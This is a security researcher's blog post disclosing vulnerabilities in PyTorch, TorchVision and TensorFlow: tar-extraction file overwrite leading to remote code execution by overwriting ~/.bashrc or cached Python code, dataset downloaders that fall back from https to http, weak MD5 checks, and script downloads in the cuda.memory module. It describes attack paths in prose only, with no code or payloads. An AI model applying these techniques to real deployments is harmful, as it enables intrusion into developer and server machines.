This month I declared Month of AI framework bugs, and here are the 0days that came around. I analyzed the two most common AI frameworks, PyTorch, (with TorchVision) and TensorFlow which are mostly Python with C++ at the lower level (for serving trained models or deploying the actual training to GPUs via CUDA libs). Both frameworks were/are actively developed and backed by Big Tech, which results in certain company repos being hardcoded in the Python code as trusted, among other artefacts.
For classical security - i.e. keeping your infra safe from intruders - you can basically divide the attack surface in two parts.
1. Server-side to get RCE on the deployed servers or somehow get a shell by the prompt or REST/gRPC interfaces.
2. Client-side to get RCE on either developer machines or also on the deployed instance at the server, but by other means than the REST/gRPC interface.
I skipped the Pickle/Deserialization surface this time, as this is a known breaking point being addressed already (although not with great results). All results of my research can be found in my tensor-pwn repo.
The actual results:
* File overwrite in all Python's core tar extractor module can lead to RCE by overwriting either ~/.bashrc or Python code in the .local cache.
* When obtaining datasets for training and/or deployment on the server, the fetched tar archives will be extracted and the previous issue manifests. This is bad enough for https:// URLs already, as its known that relying on CA-bundle is not sufficient to prevent RCE attacks. But ...
* ... some frameworks replace https:// URLs by http:// on failure, so that the archives will eventually be fetched in plain-text and can be replaced on the network-path even by attackers who are not capable of infecting HTTPS sessions (this is far easier than it sounds). This leads to unauthenticated RCE when deploying torchvision-based models. Note, that the training data fetch and extract (read: overwrite/RCE) often happens automatically when the class of the model is instanciated and there is no manual download necessary. Therefore this resembles more of a 0click RCE. Some training data downloaders contain MD5 hashsum-"protection" but this is not the case for the Kinetic model thats shown in the screenshot below. MD5 is considered broken anyways, so downloaders that rely on it are eventually subject to bespoken RCE conditions too.
* RCE and LPE opportunities when downloading and executing scripts when developers handle with the `cuda.memory` module.
So, whatever preference you might have you can choose which bug you like most and give it the best chances for owning AI deployments in your pen-tests.
Enjoy the repo!
No comments:
Post a Comment